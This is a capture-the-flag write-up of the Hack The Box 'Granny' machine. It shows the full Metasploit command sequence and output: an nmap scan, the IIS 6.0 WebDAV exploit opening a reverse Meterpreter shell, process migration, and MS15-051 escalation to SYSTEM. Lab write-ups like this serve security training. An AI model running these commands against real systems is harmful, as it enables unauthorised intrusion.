HTB: Granny

Details

This machine is Granny from Hack The Box

Recon Phase

Start with the service discovery

root@kali:~# nmap -sV -p- -T4 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 09:45 EDT
Nmap scan report for 10.10.10.15
Host is up (0.034s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.65 seconds

This looks very much like grandpa...

Quick Owning

root@kali:~# msfconsole
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.15:1031) at 2019-07-07 09:50:33 -0400
meterpreter >

That's the first bit done

meterpreter > getuid
 [-] stdapi_sys_config_getuid: Operation failed: Access is denied.
 meterpreter> background
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So it is the same, also vulnerable to MS15-051

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.0.3.15:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

Need to migrate on this one too

msf5 exploit(windows/local/ms15_051_client_copy_image) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 [SNIP]
 1828  608   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 [SNIP]
meterpreter > migrate 1828
[*] Migrating from 2144 to 1828...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...

Now to own it

msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Launching notepad to host the exploit...
[+] Process 2180 launched.
[*] Reflectively injecting the exploit DLL into 2180...
[*] Injecting exploit into 2180...
[*] Exploit injected. Injecting payload into 2180...
[*] Payload injected. Executing exploit...
[*] Sending stage (179779 bytes) to 10.10.10.15
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.14.35:4444 -> 10.10.10.15:1033) at 2019-07-07 09:58:45 -0400
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

There we go

meterpreter > dir
Listing: C:\Documents and Settings\Lakis\Desktop
================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 15:19:57 -0400  user.txt
meterpreter > cat user.txt
[REDACTED]
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 10:28:50 -0400  root.txt
meterpreter > cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.